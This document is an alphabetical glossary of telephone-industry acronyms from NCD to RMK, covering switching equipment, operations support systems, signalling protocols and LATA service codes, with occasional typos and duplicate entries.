NCDAFTA      Network call denial (NCD) denied after answer
NCDBEFA      NCD denied before answer
NCDBLKD      NCD returned blocked
NCDCCBL      NCD code control blocked
NCDDBOV      NCD data base overload
NCDDBOV      NCD database overload
NCDDENY      NCD deny received
NCDDSBL      NCD direct signaling blocked
NCDNOXL      NCD returned no translation
NCDOVLD      NCD returned overload
NCDUNEQ      NCD returned unequipped
NCH          Noch
NCI          Network channel interface
NCI          No card issue
NCLK         Network clock
NCLS         Non-capitalized lease system
NCMASTER     No circuit master
NCOO         Network central office operations
NCOS         Dms 100 class of service
NCOSC        Network clock 2 oscillator
NCOSS        Network communication and operations support system
NCP          National control point
NCP          Network control point
NCP          Network control point (in a SDN)
NCP          Network control program (IBM3725 software)
NCR-         Sclrnetwork completion report-system called line report system
NCRPAB       Network cost results plan
NCS          National communications system
NCS          National communicatons system
NCSPC        Non-conforming stored program control
NCT          Network control and timing
NCT (CP)     Network control and timing call processing
NCT LINKS    Network control and timing links
NCTE         Digital network channel equipment
NCTE         Network channel terminating equipment
NCTE         Network channel terminating equipment (FCC NT1)
NCTLNK       Network control and timing link
NCU          Network control unit
ND           Network data line INTER/TRA blocal 1-26
NDA          Network data analyzer
NDA          Network delivery access
NDBS         Network data base system
NDC          National destination code (i.e. area code)
NDC          Network data collection
NDC          Node data collection
NDCC         Network data collection center
NDIS         National dial-it services
NDPCC        Network data processing coordination center
NDRAS        Network distribution resource administration system
NDS          Network data system
NDS          Network distribution services
NDS-TIDE     Network data system-traffic information distributor and
NDS/ANN      Announcement system - System/36
NDS/BMR      Bmrbudget morning report - System 36
NDS/CONAD    Conadcontract administration system - System 36
NDS/FLEXNDS  Flexible reporting
NDS/FORMS    Mechanized forms - System 36
NDS/MT       Mechanized tool interface - System 36
NDS/PDB      Personnel database - System 36
NDU          Network data unit
NE           Near end
NE           Network element
NE           Network elements
NEAS         Non-optional extended area service
NEBE         Near end block error (IOM2 monitor message)
NEBS         Network equipment-building system
NEBS         Network equlpment-building system
NEBS         New equipment-building system
NECA         National exchange carrier association
NECC         National emergency coordination center (bellcore)
NEG          Negative
NEON         Nonmanagement employee opportunity network
NERC         National emergency relocation center
NESAC        National electronic switching assistance center
NESC         National electric safety code
NET          (ec) european standards of telecommunication
NETPARS      Network performance analysis reporting system (IBM Vtam)
NETPRT       Netprt
NETS         Nationwide emergency telecommunications system
NETTIMS      Nettims
NETWORK      Sidethe segment of the time slot interchanger (TSI) that is
NEXT         Near end cross (x) talk
NEXT         Near end crosstalk
NEXT         Node exhaust tool system
NFID         Non-fielded id
NFM          Network force management
NFS          Network file system
NFT          Network file transfer
NG           No good
NGF          Number group frame
NGF          Number group frame for 5 Cross Bar
NHLS         Next higher level support
NHR          Non hierarchial routing
NHR          Not hard to reach
NI           Network interface
NI/NC        Network interface/network channel
NID          Network in dialing
NID          Network information database
NIP          Nucleus initialization program
NIPA         Net income and productivity analysis
NIRS         National yellow pages services invoice receiving system
NIS          Operation system-intelligent network elements
NIS(FLEXCOM) Network interface system - OPS/INE
NKP          No key pulse
NKP          No key pulse (MDII)
NL-PG        Line number page
NLD          Nonlinear distortion
NLD-SN       Nonlinear distortion signal/noise
NLDM         Network logical data manager (IBM VTAM option)
NLP          Network layer protocol
NM           Network maintenance
NM           Network management
NM           Network management.
NM           Network module
NMA          Network management applique
NMA          Network monitoring and analysis
NMAT         Nonmanagement attendance tracking system
NMB          Network management busy (NTI)
NMC          Network management center
NMC          Network mondule controller (NTI)
NMDT         Network management display terminal (AT&T)
NMMPEN       Network maintenance management planing
NMOS         Network management operations support
NMPR         Network management printer (AT&T)
NMS          Network management services
NMS          Network management system
NN           Two digit number
NNN          Three digit number
NNNN         Four digit number
NNX          Central office code designating the customer exchange
NNX          Network numbering exchange
NNX          Telephone exchange code
NO           Number
NOC          National operations center at Bedminister N.J.
NOC          Network operations center
NOC          Normalized office code
NOCS         Network operations center system
NOD          Network out dialing
NODAL        Network operations forum
NOE          Number of oes to be assigned
NOL          Nac service order listing
NOMAD        No-op instruction
NOPS         Network operations plan system
NOR/TADS     North region/testing and development system
NORAD        North american air defense command
NORGEN       Network operation report generating
NORGEN       Network operations report generator
NORGEN       Network operations report generator system
NORM         Normal
NORM         Return to normal (IOM2 monitor command/message)
NOS          Network operating system
NOTIS        Network operations trouble information system
NOW          Network optical warehouse
NP           Non-published
NPA          Area code and exchange number
NPA          Network peformance analyzer (IBM)
NPA          No power alarm
NPA          Numbering plan area (area code)
NPAP         Nonmangement performance appraisal plan
NPC          Network processor circuit
NPC          No parameter choices
NPDA         Network problem determination applicator (IBM)
NPH          Network protocol handler
NPM          Network performance monitoring system
NPS          Network planning system
NPSI         Ncp packet switching interface
NPUMP        Normal pump
NPV          Net present value
NQ           Telegraph customized-service code for LATA access
NR           No response.
NRAS         Nova/rider awards system
NRC          Non-recurring charge
NRG          Number of rings
NRM          Normal response mode (hscx)
NRM          Normalizing ccs value
NRODD        Non-redundant ODD
NRRI         National regulatory research institute data
NRRT         Non-reroutable traffic
NRS          Network routing system (MBT)
NRT          No response while in test mode.
NRZ          Non return to zero
NRZC         Nrz change
NRZI         Nrz inverted
NRZM         Nrz mark
NSA          National security agency
NSAC         Network service administration center
NSACGCOMP    NS SCP ACG component
NSBADRESP    NS SCP response message with invalid data
NSC          Network service center
NSCMP        Network service center multi (dddcservice bureau)
NSCS         Network service center system
NSD          No start dial
NSD          Number summary display
NSDB/IA      Network and service data base/interface administration
NSE          Network switching engineering
NSE          Noise
NSEC         Network switching engineering center
NSEP         National security emergency preparedness
NSFNET       National science foundation network
NSN          Network services node
NSNONRTEMSG  NS reject message
NSP          Network service part (SS7: SCCP+MTP)
NSP          Non sent paid (coin)
NSPEC        Node spec file
NSPMP        Network service performance measurement plan
NSPMP        Network switching performance measurement plan
NSPRR        Network switching performance results report
NSQRYFAIL    NS query fail
NSS          Network support system
NSSD         Network switched services district
NSSNCOMP     NS SCP response message with a send notification
NSSNCOMP     NS SCP response message with a send notification received at the switch
NSTAC        National security telecommunications advisory committee
NSTNMSG      NS termination notification message sent from the switch to the SCP
NSTS         Network services test system
NSU          Network support utilities
NSs          Network system (i.e. DACS; SDACSL CDACSL OSU; CSU... etc)
NStA         (Ger) PBX
NT           Network termination
NT           Northern telecom
NT           Protection alarm-metalic-service code for LATA access
NT/S         NT simulator     SIPB7020
NT01         Network frame unable to switch off line after fault detection
NT02         Network path trouble trunk to line - 1AESS network trouble
NT03         Network path trouble line to line - 1AESS network trouble
NT04         Network path trouble trunk to trunk - 1AESS network trouble
NT06         Hourly report of network frames made busy - 1AESS network trouble
NT1          NT serving layer 1 (NCTE)
NT10         Network path failed to restore -1AESS network trouble
NT2          NT serving layer 1 to 3 (subscriber interface of nt
NTC          National trunk congestion
NTD          Normal direction
NTDACT       Network termination (NT) is deactivated.
NTE          Network terminal equipment
NTE          Network terminating equipment
NTEC         Network technical equipment center
NTEC         Network terminal equipment center
NTEC         Networkbterminal equipment center
NTI          Northern telcom inc.
NTIA         National telecommunications and information agency
NTM          Nt test mode (IOM2 monitor message)
NTN          Number of tns to be assigned
NTO          Network terminal option (IBM)
NTOFN        NT off normal.
NTP          Northern telecom practice (NTI)
NTPWR        NT lost power.
NTRAP        Network trouble analysis plan
NTS          Network technical support
NTS          Network test system
NTT          No test trunk
NTTMP        Network trunk transmission measurement plan
NTWRK        Network
NU           Protection alarm-service code for LATA access
NUA          (international) network user address
NUA          Network user address
NUA          Network utilization analysis
NUC          Nailed-up connection
NUI          Network user identification
NUL          Null
NUP          National user part
NV           Protective relaying/telegraph grade-service code for LATA access
NVM          Non volatile memory (eeprom)
NW           Telegraph grade facility-75 baud-service code for LATA access
NWB          Network-busy (NTI)
NWK          Adminnetwork administration budgets system
NWM          Network management (NTI)
NWPK         Network packs
NXX          Refers to the central office designation of the telephone
NY           Telegraph grade facility- 150 baud-service code for LATA access
NYNEX        NYNEX corporation
NYNEX        New york
NYPS         National yellow pages services
NYPSA        National yellow pages services association
O            Priority.
O+I          Originating plus incoming calls to a switching module.
O-LTM        Optical line terminating multiplexer
O/S          Operating system
OA           Line equipment assignment option
OA           Out of alignment
OA&M         Operations
OA&M         Operations administration and maintance
OAM          Office data administration system
OAP          Operator services position system administrative processor
OASIS        Office automation strategy for information systems
OASIS        Overseas accounting settlement and information
OASYS        Office automation system
OATQ         OSPS ANSI TCAP query and reply
OATS         Operator assistance tracking system
OBA          Out of band announcement
OBF          Ordering and billing forum
OBH          Office busy hour
OBS          Observed data rate
OC           Office communication
OC           Operating company
OC           Operator centralization
OC&C         Other charges and credits
OCAS         OSPS customer account services
OCAS7        OSPS customer account services CCSS7/international CC validation
OCC          Other common carrier
OCC          Other common carriers
OCC          Usage occupancy
OCCH         Outgoing connections per circuit per hour
OCCS         OSPS common channel signaling
OCCS         Order control and coordination system (BTL)
OCE          Other common carrier channel equipment
OCN          Operating company number
OCOIN        OSPS coin
OCP          Optional calling plan
OCP          Origination point code (SS7)
OCPDG        Ocp data gathering
OCR          Optical character reader (auerbach computer technology report)
OCR          Optical character recognition (IBM)
OCRS         Optical character recognition system
OCS          Offical communication services
OCS          Old class of service
OCS/CTS      Official communications services installation and
OCS/CTS      Official communications services installation and maintenance cos
OCSDSELR     OCS data station equipment location report
OCSOLRM      Official communications services (OCS) on-line reference
OCTD         OSPS centralized automatic message accounting tone decoder
OCU          Office channel unit
ODA          Office data administration
ODA          Office data assembler
ODA          Office document architecture
ODAC         Operations distribution administration center
ODACCIN      OSPS directory assistance (DA) call completion and intercept
ODB          On-demand B-channel counts.
ODB          Operations divestiture board
ODCS         Official data communications service
ODD          Office dependent data
ODD          Operator distance dialing
ODDBU        Office dependent data backup
ODDD         Operator direct distance dialing
ODDS         Order data distribution system
ODIN         Online data integrity system
ODP          Office dialing plan
ODP          Organization development program
ODP          Organizational design program
ODS          Overhead data stream
ODS          Tnds on-line demand servicing
OE           Office equipment
OE           Office equipment / office equipment number
OE           Office equpiment number
OEC          Other exchange carrier
OEC          Outside plant equivalence codes
OEIC         Optoelectronic integrated circiut
OEIS         OSPS external information system
OEM          Original equipment manufacture
OEM          Original equipment manufacturer
OF           Official (telco owned)
OF           Overflow
OFA          OSPS facility administration
OFC          Office
OFF          OSPS fast features
OFF HK       Off hook
OFFN         Off-normal
OFL          Overflow(s)
OFNPS        Outstate facility network planning system
OFRD         Offered (calls [peg count])(NTI)
OFRT         Office route (NTI)
OFT          Optical fiber tube
OGO          Outgoing only trunk
OGT          Outgoing trunk
OI           Off premises intercommunication station line INTER/TRA blocal 1-2
OI           Optical interface
OIJ          Orders in jeopardy
OINTA        OSPS interflow listing services/C-ACD measures
OIRCV        OSPS interflow T&A calls received
OISNT        OSPS interflow T&A calls sent
OKMDT        Oklahoma management development training
OKP          Operational kernel process
OKRA         Operator keyed trouble report
OLCP         Optional local calling plan
OLIDB        OSPS line information data base
OLIPD        Online invoice payment data
OLRM         Online reference material
OLS          Originating line screening
OLTEP        Online test executive program
OLTS         Optical loss test set
OM           Operational measurement (NTI)
OM           Operational measurements
OM           Output mux
OMAP         Operations and maintanance application part
OMAT         Operations maintenance and administration team
OMC          Operating and maintainance center
OMD          Out messages - day
OMDB         Output message data base
OMDB         Output message database
OMISC        OSPS miscellaneous call
OML          Outgoing matching loss
OMM          Output message manual
OMNI         Online marketing networked information system
OMP          SS7 fe operation management protocol
OMPF         Operation and maintenance processor frame
ON           Off network access line INTER/TRA blocal 1-26
ON HK        On hook
ONA          Open network architecture
ONA          Open network architecture (FCC computer inquiry iii)
ONAC         Operations network administration center in K.C. (AT&T)
ONAL         Off network access line
ONALS        Off-net access lines
ONC          On line COSMOS
ONDDBOV      OSPS NCD message received indicating database overload
ONDDBUN      OSPS NCD message returned data base unable to process
ONDGMSG      OSPS NCD message received garbled
ONDIRPY      OSPS NCD message received with an inconsistent reply
ONDNBLK      OSPS NCD message returned because of network blockage
ONDNCON      OSPS NCD message returned because of network congestion
ONDNRTE      OSPS NCD message returned because of no routing data
ONDTOUT      OSPS NCD message returned because of timeout
ONDUNEQ      OSPS NCD message returned
ONDURPY      OSPS NCD message received with an unexpected reply
ONI          Operator number identification
ONP          Open network provision
ONPA         Originating numbering plan area
ONS          On line switch
ONSITE       Urban decisions system
ONTC         Office network and timing complex
ONTC         Office network and timing complex (CM2 offices only)
ONTCCOM      Office network and timing common units
OOB          Out-of-band
OOC          Originating office code
OOC          Out-of-chain
OOF          Out-of-frame
OP           Off premises extension INTER/TRA blocal 1-26
OP           Operation
OP           Outside plant
OP ALL       Option all
OPC          Originating point code
OPC          Originating point codes
OPCDB        Operations common database
OPDU         Operations protocol data unit (x.411: p3)
OPEOS        Outside plant planning
OPH          Operator handled
OPM          Outage performance monitoring
OPM          Outside plant module
OPN          Open-of-day report
OPNOXL3      OSPS position no level 3 protocol.
OPR          Operator
OPS          Off-premises station
OPS          Outside plant study system
OPSM         Outside plant subscriber module
OPT          Optional
OPU          Outside plant cable usage
OPX          Off-premises extension
OR           Originating register
OR & RG      Operating rate and route guide
ORB          Office repeater bay
ORBIT        Osp rehabilitation budget information tracker
ORC          Originating rate center
ORD          Service or work order
ORD          Work order
ORD#         Order number
ORDN         Order number.
ORDNO        Service order number
ORE          Order edit
ORE-G        Order edit global
ORI          Order input
ORIG         Allows originating
ORLF         Originating register link frame
ORLMF        Originating register line memory frame
ORM          Optical remote module
ORM          Optical remote switching module
ORM          Optically remote switching module
ORMC         Originating register marker connector
ORP          Operational review plan
ORR          Overflow reroute
ORRS         Online records and reporting system (TNDS)
ORS          Order send
ORTN         Orientation
ORTR         OSPS real-time rating
OS           Off premises PBX station line INTER/TRA blocal 1-26
OS           Operations systems (operations support systems) (OSS)
OS           Operator service
OS           Origination scanning
OS           Out of service
OS           Out sender
OS           Outstate
OS/D         Operator services/deaf
OSAC         Operator services assistance center
OSAC         Operator services of answer consistency
OSAM         Overflow sequential access method (IBM)
OSAP         Operations systems architecture plan
OSC          Operator services center
OSC          Oscillator
OSCAS        Operator service control access system
OSDS         Operating system for distributed switching
OSDS-C       Operating system for distributed switching in the conection
OSDS-M       Operating system for distributed in the switching module.
OSE          Oscillator error flip-flop
OSI          Open system interconnection
OSI          Open systems interconnection
OSLF         Out sender link frame
OSM1         Optional services menu screen number 1
OSN          Operations systems network
OSO          Originating screening office
OSO          Originating signaling office
OSPE         Outside plant engineer
OSPI         Operator services planning information
OSPRE/CON    Outside plant reconciliation
OSPS         Operator service position system
OSPS         Operator services position system
OSPS         Outside plant studies
OSPS-DL      OSPSystem data links
OSR          Ongoing support request
OSS          Operation support system
OSS          Operations support system
OSS          Operations support system (BTL)
OSS          Operator service signalling
OSS          Operator services system
OSSGR        Operator services system generic requirements
OSSP         Operations systems strategic plan
OSSS         Operator services support system
OSTC         Operations systems technical center
OT           Originating traffic
OT           Other type
OT           Overtime
OTA          OSPS toll and assistance
OTC          Operating telephone company (in bell system)
OTDR         Optical time domain reflectometers
OTER         Operator team efficiency ratio
OTG          Outgoing trunk group
OTH          Other
OTO          Office-to-office
OTR          Operational trouble report
OTSS         Off the shelf system
OTTS         Outgoing trunk transmission system
OUC          Orgination unit code
OUT          Outgoing trunk groups
OUTWATS      Outward wats
OUTWATS      Outward wide area telecommunications service
OVF          Overflow (NTI)
OVLT         Overvoltage protection
OVLY         Overlay scheduling
OVOEQ        OSPS call volume and equipment usage
OVRLD        Overload or congestion control
OVRRNG       Overrange
OVS          Overseas
OVW          Equipment class overwrite
OW           Over-write
OWG          Optical wave guide
OWT          Outwats [code 024(5500-5600)]
OXPRESS      Zero express
P            Commitment time for having this trouble repaired.
P-tone       Pseudo tone
P/AR         Peak-to-average ratio
P/F          Poll/final bit
PA           Power allarm
PA           Program address
PA           Program application
PA           Protective alarm (AC) INTER/TRA blocal 1-26
PABX         Private automatic branch echange
PABX         Private automatic branch exchange
PAC          Percent access chargeable
PACE         Program for arrangement of cables and equipment
PACK         Peripheral equipment packs
PACT         Prefix access code translator
PAD          Packet assembler/dissasembler
PADDLE       Program for administering data bases in the lfacs
PADS         Planning analysis and decision support
PADSX        Partially automated digital signal cross-connect
PAK          Work packages
PAL          Pre-service action limit
PAL          Price analysis list
PAL          Pricing and loading (mcauto)
PAL          Purchasing authorization letter
PAM          Pass along method (SS7: in ISUP)
PAM          Primary access method
PAM          Pulse amplitude modulation
PAN          Panel
PAN          Personal account number
PANDS        Purchase & sales
PANS         Pretty advanced new stuff
PAP          Publications' accounts payable
PAQS-10      Provisioning and quotation system
PARMS        Parameters
PARTS        Tvcom electronic parts inventory
PAS          Protocol architecture specification for IOS (PCT)
PAS          Public announcement service
PAT          Position attached signal time-out
PAT          Position attached signal time-out (MDII)
PAT          Power alarm test
PATROL       Old version of 'esscoer'
PAX          Private automatic exchange
PAYRO1IC     Payroll-information center
PB           Lajga
PB           Placement bureau
PB           Sdga
PBC          Peripheral board controller
PBC          Peripheral bus computer
PBC          Peripheral bus. computer
PBC          Processor bus controller
PBD          Pacific bell directory
PBG          Packet business group
PBHC         Peak busy hour calls
PBM          LTG = 0 ho/mo msg reg (no ANI)
PBO          Paperless business office
PBOD         Pac bell order dist.
PBVS         Pacific bell verification system
PBX          Private branch exchange
PBXC         Private branch exchange center
PBXWL        Private branch exchange wiring list
PC           Peg count
PC           Peripheral control (software)
PC           Power controller
PC           Primary center
PC           Process controller
PC           Switched digital-access line INTER/TRA blocal 1-26
PCA          Philip crosby associates
PCB          Program communications block-IMS (IBM)
PCC          Peg count converters
PCDA         Program controlled data acquisition
PCF-II       Programming control facility-II (IBM)
PCH          Parallel channel
PCI          Panel call indicator
PCID         Primary circuit identification
PCL          Payroll change list
PCL          Pcm data clock
PCM          Program control module
PCM          Pulse code modulation
PCN          Personal communication network (UK)
PCN          Product change notices
PCO          Peg count and overflow
PCO          Plant control office
PCP          Primary control program
PCR          Preventive cyclic retransmission (SS7 in MTP)
PCSN         Public circuit switched network
PCT          IOS program coding tools (SDL oriented)
PCTF         Per-call test failure
PCTF         Per-call test failure.
PCTV         Program controlled transverters
PD           Peripheral decoder
PDA          Parameteredatanassembler
PDA          Partial dial abandon
PDA          Partial dial abandon (MDII)
PDC          Primary digital carrier
PDF          Power distribution frame
PDI          Power and data interface
PDIT         Prefix/feature digit interpreter
PDM          Power down mode
PDN          Public data network
PDSP         Peripheral data storage processor
PDT          Partial dial time-out
PDT          Partial dial time-out (MDII)
PDU          Protocol data unit (x.400)
PE           Peripheral equipment
PE           Program audio 200-3500 hz-service code for LATA access
PECC         Product engineering control center
PEP          Position establishment for parties
PER          For each.. or according to
PER          Protocol error record
PF           Printout follows
PF           Program audio 100-5000 hz-service code for LATA access
PFM          Pulse frequency modulation
PFOFF        Power feed off (C/I channel code)
PFPU         Processor frame power unit
PFR          Party line fill report
PFR          Polarity failure
PFR          Polarity failure (MDII)
PFS          Page format selection (teletex)
PFS          Pcm frame synchronisation signal
PG           Page
PG           Paging INTER/TRA blocal 1-26
PG           Program document index
PG           Program frequency weighting
PGTC         Pair gain test controller
PH           Packet handler
PH           Parity high bit
PH           Pending header
PH           Protocol handler
PH JTR       Phase jitter
PH-          Physical-
PHY          Physical
PIA          Plug-in administrator
PIC          PCM interface controller
PIC          Plastic-insulated cable (plant)
PIC          Polyolefin insulated cables (plant)
PIC          Primary independent carrier (switching)
PICB         Peripheral interface control bus
PICS         Plug-in inventory control system
PICS         Plug-in inventory control system (PICS/DCPR)
PICS/DCPR    PICS/detailed continuing property records
PID          Personal ID
PIDB         Peripheral interface data bus
PIINT        Allow packet interface interrupt
PIN          Personal identification number
PIOCS        Physical i/o system
PIP          PCM interface port
PIP          Packet interface port
PIU          PCM interface unit
PJ           Program audio 50-8000 hz-service code for LATA access
PK           Program audio 50-15000 hz-service code for LATA access
PKC          Package category
PKT          Package type
PL           Parity low bit
PL           Private line
PL           Private line circuit number
PL           Private line-voice INTER/TRA blocal 1-26
PLAR         Private line automatic ringdown
PLC          Physical link control (IOS)
PLD          Partial line down (teletex)
PLGUP        Plug-up (currently no affect).
PLIC         Pcm line interface
PLL          Phase locked loop
PLU          Partial line up (teletex)
PM           Peripheral module
PM           Peripheral modules
PM           Phase modulation
PM           Plant management
PM           Preventive maintenance
PM           Protective monitoring INTER/TRA blocal 1-26
PM01         Daily report - 1AESS plant measurments
PM02         Monthly report - 1AESS plant measurments
PM03         Response to a request for a specific section of report - 1AESS
PM04         Daily summary of iC/Iec irregularities - 1AESS plant measurments
PMAC         Peripheral module access controller
PMB          LTG = 1 ho/mo regular ANI6
PMI          Plant managementninstruction
PMS          Peripheral maintenance system pack
PMS          Peripheral maintenance system packs
PMS          Plant measurements system
PMS HUB      Picture phone meeting service hub
PMU          Precision measurement unit
PN           Pseudo noise (code)
PNB          Pacific northwest bell
PNL          Premis number list for TN
PNP          Private numbering plan (i.255 b)
PNPN         Positive-negative-positive-negative devices
POB          Periphal order buffer
POF          Programmable operator facility
POP          Point of presence
PORT         Remote access test ports
POS          Centralized automatic message accounting positions (NTI)
POS          Position
POS          TOPS (DMS) position (NTI)
POSN-P       Posn-p
POSNOB       OSPS position no B-channel.
POSNRSP      OSPS position no response.
POT          Point of termination
POTS         Plain old telephone service
POVT         Provisioning on-site verification testing
PP           Post pay
PPC          Pump peripheral controller
PPD          Peripheral pulse distributor
PPG          Precedence and preemption group
PPM          Periodic pulse metering.
PPN          Public packet switching
PPS          Product performance surveys
PPS          Public packet switching network
PPS          Pulse per second
PPSN         Public packet switched network
PPSRV        Pre-post service.
PPU          Power providing unit
PP_D_M       Point-to-point data maintenance
PQ           Program grade customized-service code for LATA access
PR           Cable pair id
PR           Pair normally tip and ring
PR           Protective relaying-voice grade INTER/TRA blocal 1-26
PRA          Primary rate access
PRCA         Puerto rico communications authority
PRE          Previous
PREMIS       Premises information system
PRFX         Prefix
PRFX         Prefix translations
PRI          Frame priority
PRI          Primary rate interface
PROC         Processor
PROG         Program
PROM         Programmable read-only memory
PROMATS      Programmable magnetic tape system
PROT         Protection
PROTEL       Procedure oriented type enforcing language
PROTO        Protocol circuit
PRP          Periodic purging of remarks
PRP          Permanent cable pair remarks
PRS          Personal response system
PRT          Print
PRTC         Puerto rico telephone company
PRZ          Preferred rate zone
PS           Msc constructed spare facility INTER/TRA blocal 1-26
PS           Packet switching
PS           Previously published/non-published facility indicator
PS           Program store
PSAP         Public safety answering point
PSC          Prime service contractor
PSC          Public safety calling system
PSC          Public service commission
PSD          Programmable scanner distribution
PSDC         Public switched digital capability
PSDN         Packed-switched data network (t.70)
PSDS         Public switched digital service
PSE          Packet switch exchange
PSF          Packet switching facility
PSGRP        Packet switching groups
PSHF         Peripheral equipment shelf
PSIU         Packet switch interface unit
PSK          Phase shift keying
PSK          Phase-shift keying
PSL          IOS protocol source library
PSM          Packet service module
PSM          Position switching module
PSN          Packet switched network
PSN          Public switched network
PSO          Pending service order
PSODB        Packet switching on-demand B-channel
PSOFC        Packet switching office (ISDN)
PSPDN        Packed-switched public data network
PSPH         Packet switching PH/DSLG (ISDN)
PSPORT       packet switching protocol handler (PH) port (ISDN)
PSR          Phase shift register
PSS          Packet switch stream
PSS          Packet switched services
PSSM         Packet switching per switching module (ISDN)
PST          Permanent signal time-out
PST          Permanent signal time-out (MDII)
PST          Pre-service testing
PST          Sides protocol software development
PSTG         Packet switching trunk group
PSTLT        Pre-service transmission action limit table
PSTN         Public switched telephone network
PSTN         Public switched telephone network (t.70)
PSU          Packet switch unit
PSU          Packet switch unit.
PSU          Program storage unit
PSUPH        Packet switch unit protocol handler
PSW          Program status word
PSWD         Password access
PT           Package time
PT           Point
PT           Program timer
PTAT         Private trans atlantic telecommunications
PTCL         Protocol
PTD          Plant test date
PTR          Printer
PTT          Postal telephone and telegraph
PTW          Primary translation word
PTY          Party indicator
PTY          Party number or position
PU           Power units
PU           Power up (C/I channel code)
PUC          Peripheral unit controller
PUC          Public utilities commission
PULS         Message-rate pulsing table (AMA NTI)
PULS         Pulse
PULSG        Pulsing
PUM          Pu mode
PUMPHW       Pump hardware errors
PV           Protective relaying-telegraph grade INTER/TRA blocal 1-26
PVC          Permanent virtual circuit
PVC          Permanent virtual circuit (x.25 network)
PVC          Permanent virtual circuits
PVN          Private virtual network
PVT          Private
PW           Protective relaying-signal grade INTER/TRA blocal 1-26
PWC          Premis wire center
PX           Pbx station line INTER/TRA blocal 1-26
PX           Power cross.
PZ           Msc constructed circut INTER/TRA blocal 1-26
Q            Report class.  see table 5-1.
Q-CIF        Quarter cif (for ISDN low end video)
QAM          Quadrature-amplitude modulation
QANN         Announcements for queuing (MLHG)
QAS          Quasi-associated signaling
QEX          Question an execution
QMLHG        Queuing for multi-line hunt group
QMP          Quality measurement plan
QPA          Quality program analysis
QRSS         Quasi random signal source
QS           Packet synchronous access line INTER/TRA blocal 1-26
QSC          Quad s interface circuit     peb2084
QSF          Queuing for simulated facility
QSS          Quality surveillance system
QTAM         Queued telecom access method
QTG          Queuing for trunk groups
QU           Packet asyncronous access line INTER/TRA blocal 1-26
QUE          Queue
R            Initials and location of person reporting this trouble.
R            Review pending dispatch
R            Ring
R&R          Rate & route
R&SE         Research & systems engineering
R-GRD        Ring-to-ground
R-T          Ring-to-tip
R/O          Read/only
R/W          Read write
R/WM         Read/write memory
R1           Regional signaling system 1 (based on CCITT SS5 (2600))
R2           Regional signaling system 2 (based on CCITT SS4 (2400))
RA           Rate adaption
RA           Ready access
RA           Remote attendant INTER/TRA blocal 1-26
RACF         Remote activated call forwarding
RAD          Receive adress
RAF          Recorded announcement facility
RAF          Recorded announcement function
RAF          Recorded announcement function (DSU2)
RAL          Relay assignment list
RAM          Random access memory
RAM          Random-access memory
RAND         Rural area network design
RAO          Regional accounting office
RAO          Revenue account office
RAO          Revenue accounting office
RAP          Recorded announcement port.
RAP          Relay assignment parameters
RAP          Rotary assignment priority
RAR          Return address register
RAS          Release sequence number lists and related TN/OE
RAS          Remote access services
RASC         Residence account service center
RAT          Rating
RATDBOV      RATE message received indicating data base overload
RATDBUN      RATE message returned because data base unable to process
RATGMSG      RATE message received garbled
RATNBLK      RATE message returned because of network blockage
RATNCON      RATE message returned because of network congestion
RATNRTE      RATE message returned because of no routing data
RATTOUT      RATE message returned because of timeout
RATUNEQ      RATE message returned because of unequipped destination
RATURPY      RATE message received with an unexpected reply
RAU          RSM alarm
RBEF         Read block error counter for far end (IOM2 monitor command)
RBEN         Read block error counter for near end (IOM2 monitor command)
RBHC         Regional bell holding company
RBOC         Regional bell operating company
RBOC         Regional boc
RBOR         Request basic output report
RBS          Print tbs relays assignment record
RC           Rate center  (NTI)
RC           Recent change
RC           Regional center
RC           Resistance-capacitance
RC/V         Recent change and verify
RC18         Rc message response - 1AESS RC
RCC          Radio common carrier
RCC          Remote cluster controller
RCC          Request corrupted CRC (in EOC)
RCC          Reverse command channel
RCD          Received
RCE          Ring Counter Error
RCF          Remote call forward
RCF          Remote call forwarding
RCFA         Remote call forwarding appearance (NTI)
RCI          Read controller interface (IOM2 monitor command)
RCL          Route clock
RCLDN        Retrieval of calling line directory number
RCLK         Remote clock
RCM          Remote carrier module
RCMAC        Recent change memory administration center
RCMG         Recent change message generator
RCOSC        Remote clock oscillator
RCOXC        Remote clock oscillator cross couple
RCP          Recent change packager
RCP          Remote copy
RCR          Recent change report
RCRE         Receive corrected reference equivalent
RCREF        Remote clock reference
RCS          Recent change summary
RCSC         Remote spooling communications subsystem
RCT          Remote concentrator terminal
RCU          Radio channel unit
RCU          Repeater control unit (i.e. ASIC between two IEC-q2s)
RCV          Receive
RCVR         Receiver
RCW          Recent change keyword
RCXC         Remote clock cross couple
RDATE        Release date (update database date)
RDB/RDR      Recent Disconnect bussiness/resid.
RDBM         Relational data base management
RDES         Remote data entry system
RDFI         RSM digital facilities interface
RDG          Message register reading
RDS          Radio digital system
RDS          Reference distribution system
RDS          Running digital sum
RDSN         Region digital switched network
RDT          Radio digital terminal
RDT          Remote digital terminal
RDY          Resynchonisation indication after loss of framing (C/I channel CO)
RE           Lajrr
RE           Radiated emission (EME)
REACC        Reaccess
REC          Record
REC          Recreate (display)
REC          Regional engineering center
RED          Recent change message text editor
REH          Recovered history
REJ          Reject (LAP-D command/response)
REL          Release (i.451)
REL          Release non-intercepted numbers by release date
REM          Remote equipment module
REM          Remove frame locations
REMOBS       Remote observation system
REMSH        Remote shell
REN          Ring equivalence number
REOC         Real estate operations center
REP          Reprint option
REPT#        Report number
REQ          Required
RES          Reset (C/I channel code)
RES          Resistance
RES          Resume (i.451)
RES          Send a solicited response
RES1         Reset receiver (C/I channel code)
RET          Retermination of frame locations
REV          Reverse charging (i.256 c)
REV          Reversed
REW          Rework status
REX          Reexecute a service order
REX          Routine exercise.
REX          Routine exerciser.
REXX         Restructred extended executer language
RF           Radio frequency
RFI          Radio frequency interference
RID          Read identification (IOM2 monitor command)
RID          Remote isolation device
RISLU        Remote integrated services line unit
RJ           Reject
RJDT         Reject date
RJR          Remove jeopardy reason codes
RJR          Valid reject reasons
RKW          (ger pcm30) fas
RL           Repeat later
RL           Resistance lamp
RL           Retry later
RL           Return loss
RLC          Release complete msg. (SS7: in SCCP)
RLCM         Remote line concentrating module
RLDT         Release date
RLF          Re-using dips upper bound load factor
RLG          Release guard on unstable call (outgoing)
RLI          Remote link interface
RLM          Remote line module
RLO          Automatic relay assignment present
RLOGIN       Remote login
RLS          Release
RLSD         Released msg. (SS7: in SCCP)
RLST         Release status
RLT          Remote line test
RLT          Remote loop test
RLY          Miscellaneous relay
RM           Remark
RMA          Request for manual assistance
RMAC         Remote memory administration center
RMAS         Recent message automatic system
RMAS         Remote memory administration
RMAS         Remote memory administration system
RMK          Hunt group remarks
RMK          Remarks
RMK          Remarks on cable pair
RMK          Remarks on office equipment
RMK          Remarks on orders
RMK          Remarks on telephone number
